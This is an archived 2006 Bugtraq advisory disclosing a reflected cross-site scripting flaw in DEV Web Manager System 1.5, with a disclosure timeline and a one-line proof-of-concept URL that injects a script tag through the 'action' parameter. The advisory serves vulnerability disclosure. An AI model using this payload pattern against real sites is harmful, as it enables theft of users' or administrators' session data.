lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20061018151118.26920.qmail@securityfocus.com>
Date: 18 Oct 2006 15:11:18 -0000
From: corrado.liotta@...ce.it
To: bugtraq@...urityfocus.com
Subject: {x0n3-h4ck} DEV Web Manager System <= 1.5 XSS Exploit

-=[--------------------ADVISORY-------------------]=-
-=[                                                                     ]=-
-=[        DEV Web Manager System <= 1.5          ]=-
-=[                                                                     ]=-
-=[     Author: CorryL [corryl80@...il.com]      ]=-
-=[                                     www.x0n3-h4ck.org ]=-
-=[----------------------------------------------------]=-


-=[+] Application:    DEV Web Manager System
-=[+] Version:        1.5
-=[+] Vendor's URL:   http://dev-wms.sourceforge.net/
-=[+] Platform:       Windows\Linux\Unix
-=[+] Bug type:       cross-site script [XSS]
-=[+] Exploitation:   Remote
-=[-]
-=[+] Author:         CorryL  ~ corryl80[at]gmail[dot]com ~
-=[+] Reference:      www.x0n3-h4ck.org


..::[ Descriprion ]::..

DEV web manager system one application web based on php


..::[ Bug ]::..

this system e' affect from a bug of type XSS
a attaker to use the bug in order to steal sensitive information
to the users or admin


..::[ Proof Of Concept ]::..

http://web site/index.php?session=0&action=>"><ScRiPt%20%0a%0d>alert(775195196)%3B</ScRiPt>


..::[ Workaround ]::..

Nothing

..::[ Disclousure Timeline ]::..

[07/10/2006] - Vendor notification
[11/10/2006] - Vendor Response
[17/10/2006] - No patch relase from vendor
[17/10/2006] - Public disclousure

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ